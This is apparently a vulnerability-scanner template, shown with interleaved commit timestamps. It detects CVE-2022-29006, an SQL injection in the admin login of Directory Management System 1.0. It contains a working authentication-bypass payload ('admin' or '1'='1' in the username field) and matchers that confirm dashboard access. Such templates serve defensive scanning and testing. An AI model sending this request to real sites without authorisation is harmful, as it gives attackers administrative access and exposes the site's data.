2022-09-10 03:03:07 +00:00
id : CVE-2022-29006
2022-09-02 05:59:48 +00:00
info :
2022-09-29 13:38:41 +00:00
name : Directory Management System 1.0 - SQL Injection
2022-09-02 05:59:48 +00:00
author : TenBird
severity : critical
description : |
2022-09-29 13:38:41 +00:00
Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-09-02 05:59:48 +00:00
reference :
- https://www.exploit-db.com/exploits/50370
- https://phpgurukul.com/directory-management-system-using-php-and-mysql/
- https://nvd.nist.gov/vuln/detail/CVE-2022-29006
2023-04-12 10:55:48 +00:00
- https://github.com/sudoninja-noob/CVE-2022-29006/blob/main/CVE-2022-29006.txt
2022-09-02 05:59:48 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-29006
cwe-id : CWE-89
2023-07-11 19:49:27 +00:00
epss-score : 0.20033
cpe : cpe:2.3:a:directory_management_system_project:directory_management_system:1.0:*:*:*:*:*:*:*
2022-09-02 05:59:48 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : directory_management_system_project
product : directory_management_system
2022-09-02 05:59:48 +00:00
tags : cve,cve2022,sqli,auth-bypass,edb
2023-07-11 19:49:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-10 03:03:07 +00:00
- raw :
- |
POST /admin/index.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
username=admin' or '1'='1&password=1&login=login
- |
GET /admin/dashboard.php HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2022-09-10 03:03:07 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'DMS || Dashboard'
- 'DMS Admin'
- 'Admin Profile'
condition : and
- type : status
status :
- 200